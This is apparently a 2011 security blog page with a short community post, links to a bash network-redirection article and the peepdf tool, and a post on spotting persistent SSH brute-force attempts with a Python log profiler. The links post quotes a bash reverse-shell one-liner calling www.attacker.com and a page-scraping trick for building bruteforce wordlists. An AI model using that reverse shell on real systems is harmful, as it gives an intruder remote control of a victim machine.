[blog.rayfoo] Infosec, DFIR, tech geekery, thoughts and whatnot

21May/11

BTPC’s AmazinGrace

Learnt much today about the non-citizens amongst us, and more importantly, reminded that they are all people too, equally human, and equally in need as we are ourselves.

17May/11

Interesting Links

Will start linking some of the stuff that potentially would be interesting and useful here. Let's start off with an alternative BASH-fu technique to initiate and listen for TCP connections from a (supposedly pwned) Linux box:

http://blog.rootshell.be/2011/05/05/binbash-phone-home/

Now the question will arise: when could those network redirections be helpful? First, bash can be used without third-party tools to grab data from the network. The example below fetches this blog's main page:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0\n\n" >&5
  cat <&5
  exec 5>&-

Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0\n\n" >&5
  cat <&5 > foo.tmp
  exec 5>&-
  sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "\n"

Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:

  victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0

As the bash shell is very common, it can be very interesting! Just use your imagination to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is "--enable-net-redirections".

Also, a tool to help with PDF creation/modification/analysis.  Sounds promising:

http://code.google.com/p/peepdf/

peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document, showing the suspicious elements; it supports all the most used filters and encodings, and it can parse different versions of a file, object streams and encrypted files. With the installation of Spidermonkey and Libemu it provides Javascript and shellcode analysis wrappers too. Apart from this it's able to create new PDF files and to modify existing ones.

4Apr/11

Profiling of persistent SSHD brute force attack

Properly setting up and regularly monitoring logs gives you the avenue to know what's really happening with your box sitting out there in the internets, and to anticipate when bad things are about to happen. One of the warning signs would be that someone has been poking around your box, looking for an (easy?) way in.

The natural thing that would jump out at you then is that this someone has been accessing your box in far higher volumes and for far longer durations than normal, especially on services that should not be accessed by others.

This is one example of such accesses on a linux box: SSHD brute forcing over long periods of time.
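As an added example (not part of the original post), a small Python profiler over constructed sshd auth.log lines: it aggregates failed logins per source address with first/last seen, the set of usernames tried and the time span covered, then flags sources that keep failing across a long window, which is the slow, persistent pattern rather than a one-off burst. It assumes syslog-style timestamps (no year; 2011 is supplied by the caller here) and the sample lines are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (syslog format, no year); not real data.
SAMPLE_LOG = """\
May  3 04:12:01 host sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
May  3 04:12:03 host sshd[1236]: Failed password for root from 203.0.113.5 port 51240 ssh2
May  3 09:40:17 host sshd[2210]: Accepted publickey for ray from 198.51.100.7 port 40022 ssh2
May  4 02:15:44 host sshd[3301]: Failed password for invalid user oracle from 203.0.113.5 port 52001 ssh2
May  4 02:15:50 host sshd[3302]: Failed password for invalid user test from 203.0.113.5 port 52002 ssh2
May  4 12:00:00 host sshd[3400]: Failed password for ray from 198.51.100.7 port 40030 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_ts(raw, year):
    # syslog omits the year; the caller supplies it (assumption: all lines fall in one year)
    return datetime.strptime(f"{year} {' '.join(raw.split())}", "%Y %b %d %H:%M:%S")

def profile_failures(lines, year=2011):
    """Return {ip: {"count", "users", "first", "last", "span_hours"}} for failed logins."""
    stats = defaultdict(lambda: {"count": 0, "users": set(), "first": None, "last": None})
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated noise are ignored
        ts = parse_ts(m["ts"], year)
        s = stats[m["ip"]]
        s["count"] += 1
        s["users"].add(m["user"])
        s["first"] = ts if s["first"] is None or ts < s["first"] else s["first"]
        s["last"] = ts if s["last"] is None or ts > s["last"] else s["last"]
    for s in stats.values():
        s["span_hours"] = (s["last"] - s["first"]).total_seconds() / 3600
    return dict(stats)

def persistent_sources(stats, min_failures=3, min_span_hours=6):
    """Sources that keep failing across a long window: the slow, persistent pattern."""
    return sorted(ip for ip, s in stats.items()
                  if s["count"] >= min_failures and s["span_hours"] >= min_span_hours)

if __name__ == "__main__":
    st = profile_failures(SAMPLE_LOG.splitlines())
    for ip in persistent_sources(st):
        print(ip, st[ip]["count"], "failures over", round(st[ip]["span_hours"], 1), "hours")
```

Feed it a real auth.log with `profile_failures(open("/var/log/auth.log"))` and tune the thresholds to your box; a single noisy burst from one address will not pass the span check, while a source that returns over days will.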